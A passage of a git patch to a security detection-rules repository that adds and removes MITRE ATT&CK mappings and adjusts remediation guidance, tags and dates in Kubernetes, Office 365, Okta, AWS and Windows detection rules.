zero or deleting the new DaemonSet and stopping any active rollout while preserving the altered manifest for evidence. -- Roll back the workload to the last known-good version from GitOps/CI or prior ReplicaSet/Job template, then redeploy only after verifying container images, init containers, commands, serviceAccount, and privileged/host settings match the approved baseline. -- Revoke and rotate the credential used for the change (user token/cert or service account token), invalidate related kubeconfigs, and review/remove any newly created RBAC bindings, secrets, or service accounts tied to the same actor. -- Quarantine affected nodes and pods for analysis by cordoning/draining nodes that ran the new pods and collecting pod logs, container filesystem snapshots, and network egress details to identify payloads and persistence. -- Escalate to the incident response/on-call security team immediately if the change introduced privileged containers, hostPath mounts, hostNetwork, new external images/registries, or any unexpected DaemonSet creation across multiple nodes. +- Immediately pause impact by scaling the modified Deployment/CronJob to zero or deleting the new DaemonSet and stopping any active rollout while preserving the altered manifest for evidence. +- Roll back the workload to the last known-good version from GitOps/CI or prior ReplicaSet/Job template, then redeploy only after verifying container images, init containers, commands, serviceAccount, and privileged/host settings match the approved baseline. +- Revoke and rotate the credential used for the change (user token/cert or service account token), invalidate related kubeconfigs, and review/remove any newly created RBAC bindings, secrets, or service accounts tied to the same actor. +- Quarantine affected nodes and pods for analysis by cordoning/draining nodes that ran the new pods and collecting pod logs, container filesystem snapshots, and network egress details to identify payloads and persistence. +- Escalate to the incident response/on-call security team immediately if the change introduced privileged containers, hostPath mounts, hostNetwork, new external images/registries, or any unexpected DaemonSet creation across multiple nodes. - Harden by enforcing admission controls to restrict privileged settings and sensitive namespaces, requiring changes via approved automation identities, and tightening RBAC so only designated deployment controllers can create/patch DaemonSets, Deployments, and CronJobs. """ references = [ @@ -107,18 +107,6 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" [rule.new_terms] field = "new_terms_fields" value = ["user_agent.original", "source.ip", "kubernetes.audit.user.username"] diff --git a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml index dd96a8d835c..f869cc079a1 100644 --- a/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml +++ b/rules/integrations/kubernetes/privilege_escalation_service_account_rbac_write_operation.toml @@ -35,16 +35,16 @@ This rule detects Kubernetes service accounts performing allowed write actions o ### False positive analysis -- A platform automation running in-cluster (e.g., a controller or CI job using a service account) legitimately applies RBAC manifests during routine deployment, upgrades, or namespace onboarding, resulting in create/patch/update of Roles or RoleBindings. +- A platform automation running in-cluster (e.g., a controller or CI job using a service account) legitimately applies RBAC manifests during routine deployment, upgrades, or namespace onboarding, resulting in create/patch/update of Roles or RoleBindings. - A Kubernetes operator or housekeeping workflow running under a service account intentionally adjusts RBAC as part of maintenance (e.g., rotating access, reconciling drift, or cleaning up obsolete bindings) and triggers allowed delete or update actions on RBAC resources. ### Response and remediation -- Immediately remove or quarantine the offending service account by deleting its RoleBindings/ClusterRoleBindings and restarting or scaling down the owning workload to stop further RBAC writes. -- Revert the unauthorized RBAC object changes by restoring the last known-good Roles/Bindings from GitOps/manifests (or `kubectl rollout undo` where applicable) and verify no new subjects gained wildcard or cluster-admin-equivalent access. -- Rotate credentials by recreating the service account or triggering token re-issuance, deleting any mounted legacy token secrets, and redeploying workloads to ensure old tokens cannot be reused. -- Hunt and eradicate persistence by searching for additional recently modified RBAC objects and newly created service accounts in the same namespaces, then remove unauthorized accounts/bindings and scan the implicated container images for backdoors. -- Escalate to incident response and cluster administrators immediately if any change grants `cluster-admin`, introduces `*` verbs/resources, or binds a service account to privileged ClusterRoles across namespaces. +- Immediately remove or quarantine the offending service account by deleting its RoleBindings/ClusterRoleBindings and restarting or scaling down the owning workload to stop further RBAC writes. +- Revert the unauthorized RBAC object changes by restoring the last known-good Roles/Bindings from GitOps/manifests (or `kubectl rollout undo` where applicable) and verify no new subjects gained wildcard or cluster-admin-equivalent access. +- Rotate credentials by recreating the service account or triggering token re-issuance, deleting any mounted legacy token secrets, and redeploying workloads to ensure old tokens cannot be reused. +- Hunt and eradicate persistence by searching for additional recently modified RBAC objects and newly created service accounts in the same namespaces, then remove unauthorized accounts/bindings and scan the implicated container images for backdoors. +- Escalate to incident response and cluster administrators immediately if any change grants `cluster-admin`, introduces `*` verbs/resources, or binds a service account to privileged ClusterRoles across namespaces. - Harden going forward by enforcing least-privilege RBAC, enabling admission controls to restrict RBAC modifications to approved identities/namespaces, and using short-lived projected service account tokens with workload identity constraints. """ references = [ @@ -111,15 +111,3 @@ id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml index fe4db96ec06..22016d9160b 100644 --- a/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml +++ b/rules/integrations/kubernetes/privilege_escalation_suspicious_assignment_of_controller_service_account.toml @@ -108,15 +108,3 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1610" -name = "Deploy Container" -reference = "https://attack.mitre.org/techniques/T1610/" - -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml index 4883340158d..3b6bdd9ca93 100644 --- a/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml +++ b/rules/integrations/o365/collection_exchange_mailbox_access_by_unusual_client_app_id.toml @@ -185,23 +185,6 @@ id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["o365.audit.ClientAppId"] diff --git a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml index a7b3d02a970..7f28c7920d8 100644 --- a/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml +++ b/rules/integrations/o365/credential_access_entra_id_device_reg_via_oauth_redirection.toml @@ -58,6 +58,7 @@ tags = [ "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "eql" @@ -121,21 +122,3 @@ reference = "https://attack.mitre.org/techniques/T1566/002/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.001" -name = "Application Access Token" -reference = "https://attack.mitre.org/techniques/T1550/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml index d9d60e52102..5f1cc7fac8e 100644 --- a/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml +++ b/rules/integrations/o365/credential_access_identity_user_account_lockouts.toml @@ -68,6 +68,7 @@ tags = [ "Use Case: Identity and Access Audit", "Tactic: Credential Access", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "esql" @@ -153,3 +154,19 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" diff --git a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml index cb297e6c510..be7927c5f2b 100644 --- a/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml +++ b/rules/integrations/o365/defense_evasion_exchange_mailbox_audit_bypass_association.toml @@ -86,11 +86,6 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" -[[rule.threat.technique.subtechnique]] -id = "T1562.008" -name = "Disable or Modify Cloud Logs" -reference = "https://attack.mitre.org/techniques/T1562/008/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml index 0ce83d4a339..10b2649fc72 100644 --- a/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml +++ b/rules/integrations/o365/initial_access_entra_id_portal_login_impossible_travel.toml @@ -109,23 +109,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml index 5d362666fe7..39689dd40f6 100644 --- a/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml +++ b/rules/integrations/okta/credential_access_attempted_bypass_of_okta_mfa.toml @@ -92,20 +92,3 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - -[[rule.threat.technique.subtechnique]] -id = "T1556.006" -name = "Multi-Factor Authentication" -reference = "https://attack.mitre.org/techniques/T1556/006/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml index 49f0b900a26..a71ae74e7dd 100644 --- a/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml +++ b/rules/integrations/okta/credential_access_multiple_user_agent_os_authentication.toml @@ -90,23 +90,6 @@ id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml index 1c9ca26250d..52bd075b206 100644 --- a/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml +++ b/rules/integrations/okta/credential_access_okta_aitm_session_cookie_replay.toml @@ -89,6 +89,7 @@ tags = [ "Tactic: Credential Access", "Tactic: Lateral Movement", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "esql" @@ -183,24 +184,6 @@ id = "T1550.004" name = "Web Session Cookie" reference = "https://attack.mitre.org/techniques/T1550/004/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml index 86fc7707a90..ce1e17c9cf2 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_deactivate_okta_application.toml @@ -88,21 +88,3 @@ reference = "https://attack.mitre.org/techniques/T1489/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml index 0735762b208..e99fc028bfc 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_delete_okta_application.toml @@ -94,21 +94,3 @@ reference = "https://attack.mitre.org/techniques/T1489/" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[[rule.threat.technique.subtechnique]] -id = "T1562.001" -name = "Disable or Modify Tools" -reference = "https://attack.mitre.org/techniques/T1562/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml index f630bd79c29..3d7fbd734dc 100644 --- a/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml +++ b/rules/integrations/okta/impact_okta_attempt_to_modify_okta_application.toml @@ -90,16 +90,3 @@ framework = "MITRE ATT&CK" id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1562" -name = "Impair Defenses" -reference = "https://attack.mitre.org/techniques/T1562/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml index a533da4badf..9c026e9aac9 100644 --- a/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml +++ b/rules/integrations/okta/initial_access_first_occurrence_user_session_started_via_proxy.toml @@ -96,23 +96,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["okta.actor.id", "cloud.account.id"] diff --git a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml index ce13789eee4..701332ba9c9 100644 --- a/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml +++ b/rules/integrations/okta/initial_access_okta_user_attempted_unauthorized_access.toml @@ -65,6 +65,7 @@ tags = [ "Use Case: Identity and Access Audit", "Data Source: Okta", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "query" @@ -95,14 +96,6 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml index afd4246e872..8589d5de25a 100644 --- a/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml +++ b/rules/integrations/okta/initial_access_sign_in_events_via_third_party_idp.toml @@ -74,6 +74,7 @@ tags = [ "Tactic: Initial Access", "Data Source: Okta", "Resources: Investigation Guide", + ] timestamp_override = "event.ingested" type = "new_terms" @@ -135,11 +136,6 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" -[[rule.threat.technique]] -id = "T1556" -name = "Modify Authentication Process" -reference = "https://attack.mitre.org/techniques/T1556/" - [rule.threat.tactic] id = "TA0003" name = "Persistence" diff --git a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml index 100a80ef79b..b44a3a4bf4a 100644 --- a/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml +++ b/rules/integrations/okta/initial_access_successful_application_sso_from_unknown_client_device.toml @@ -94,23 +94,6 @@ id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1078" -name = "Valid Accounts" -reference = "https://attack.mitre.org/techniques/T1078/" - -[[rule.threat.technique.subtechnique]] -id = "T1078.004" -name = "Cloud Accounts" -reference = "https://attack.mitre.org/techniques/T1078/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["client.user.name", "okta.client.user_agent.raw_user_agent"] diff --git a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml index a651b18fce8..25a9fa908ba 100644 --- a/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml +++ b/rules/integrations/okta/lateral_movement_multiple_sessions_for_single_user.toml @@ -103,23 +103,6 @@ id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.004" -name = "Web Session Cookie" -reference = "https://attack.mitre.org/techniques/T1550/004/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" [rule.threshold] field = ["okta.actor.id"] value = 1 From 62bcb8977f7ecb64630bd6f770336264c5b2b245 Mon Sep 17 00:00:00 2001 From: Mika Ayenson Date: Wed, 25 Mar 2026 12:15:53 -0500 Subject: [PATCH 15/16] reset rules inadvertently removing mitre mappings --- .../initial_access_console_login_root.toml | 20 +++++- ..._created_access_keys_for_another_user.toml | 7 +- ...tratoraccess_policy_attached_to_group.toml | 24 ++++++- ...stratoraccess_policy_attached_to_role.toml | 24 ++++++- ...stratoraccess_policy_attached_to_user.toml | 24 ++++++- .../azure/ml_azure_rare_event_failures.toml | 49 ++++++------- ...ersistence_automation_account_created.toml | 20 ++++-- ...nce_cluster_admin_rolebinding_created.toml | 20 +++++- ...nsitive_role_creation_or_modification.toml | 20 +++++- ..._service_account_bound_to_clusterrole.toml | 20 +++++- ...harepoint_site_collection_admin_added.toml | 22 +++++- ...icious_activity_reported_by_okta_user.toml | 41 ++++++++++- rules/linux/persistence_at_job_creation.toml | 38 +++++++++- rules/linux/persistence_boot_file_copy.toml | 10 ++- .../linux/persistence_cron_job_creation.toml | 38 +++++++++- .../persistence_systemd_service_creation.toml | 20 +++++- ...tion_ml_linux_anomalous_sudo_activity.toml | 20 ++++-- .../defense_evasion_injection_msbuild.toml | 19 ++++- ...erading_suspicious_werfault_childproc.toml | 30 +++++--- ...e_evasion_parent_process_pid_spoofing.toml | 24 ++++++- .../execution_via_hidden_shell_conhost.toml | 21 ++++-- .../persistence_appcertdlls_registry.toml | 24 ++++++- ...egistry_startup_shell_folder_modified.toml | 24 ++++--- ...sistence_group_modification_by_system.toml | 20 ++++-- ...persistence_msoffice_startup_registry.toml | 24 ++++--- .../persistence_powershell_profiles.toml | 24 ++++++- ...escalation_via_accessibility_features.toml | 30 ++++---- ...stence_suspicious_com_hijack_registry.toml | 41 ++++++++--- ...nce_suspicious_scheduled_task_runtime.toml | 71 ++++--------------- .../persistence_temp_scheduled_task.toml | 24 ++++++- .../persistence_time_provider_mod.toml | 29 +++++--- .../persistence_via_application_shimming.toml | 24 ++++++- ...emetrycontroller_scheduledtask_hijack.toml | 29 +++++++- ...privilege_escalation_lsa_auth_package.toml | 24 ++++++- ...ge_escalation_persistence_phantom_dll.toml | 29 ++++++-- ...on_port_monitor_print_processor_abuse.toml | 28 +++++++- ...lege_escalation_uac_bypass_com_clipup.toml | 27 +++++-- ...n_uac_bypass_com_interface_icmluautil.toml | 27 +++++-- ...alation_uac_bypass_diskcleanup_hijack.toml | 30 +++++--- ...escalation_uac_bypass_dll_sideloading.toml | 30 ++++++-- ...ge_escalation_uac_bypass_event_viewer.toml | 24 ++++++- ...n_unusual_svchost_childproc_childless.toml | 30 ++++---- ...ommand_and_control_bitsadmin_activity.toml | 26 +++---- ...fense_evasion_injection_from_msoffice.toml | 41 ++++------- ...defense_evasion_service_path_registry.toml | 33 +++++---- .../defense_evasion_services_exe_path.toml | 33 +++++---- ...e_iam_instance_request_to_iam_service.toml | 16 +++-- 47 files changed, 932 insertions(+), 341 deletions(-) diff --git a/rules/integrations/aws/initial_access_console_login_root.toml b/rules/integrations/aws/initial_access_console_login_root.toml index 8ac3d7d8659..a8842b9754b 100644 --- a/rules/integrations/aws/initial_access_console_login_root.toml +++ b/rules/integrations/aws/initial_access_console_login_root.toml @@ -2,7 +2,7 @@ creation_date = "2020/06/11" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -133,12 +133,10 @@ field_names = [ [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" - [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -148,3 +146,19 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0004" +name = "Privilege Escalation" +reference = "https://attack.mitre.org/tactics/TA0004/" + diff --git a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml index be58e3a20a7..6a4dcd371c0 100644 --- a/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml +++ b/rules/integrations/aws/persistence_iam_user_created_access_keys_for_another_user.toml @@ -2,7 +2,7 @@ creation_date = "2024/06/13" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -158,17 +158,17 @@ from logs-aws.cloudtrail-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.001" name = "Additional Cloud Credentials" reference = "https://attack.mitre.org/techniques/T1098/001/" + + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -191,7 +191,6 @@ id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" - [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml index 2d378e9d56b..7a16cf870c9 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_group.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -121,21 +121,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml index c3021be1173..87734bebf8d 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_role.toml @@ -2,7 +2,7 @@ creation_date = "2024/05/31" integration = ["aws"] maturity = "production" -updated_date = "2026/03/24" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -119,21 +119,39 @@ iam where event.dataset == "aws.cloudtrail" [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1098" name = "Account Manipulation" reference = "https://attack.mitre.org/techniques/T1098/" - [[rule.threat.technique.subtechnique]] id = "T1098.003" name = "Additional Cloud Roles" reference = "https://attack.mitre.org/techniques/T1098/003/" + + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" reference = "https://attack.mitre.org/tactics/TA0004/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml index 3f13e220c2a..f694877d86f 100644 --- a/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml +++ b/rules/integrations/aws/privilege_escalation_iam_administratoraccess_policy_attached_to_user.toml @@ -2,7 +2,7 @@ creation_date = 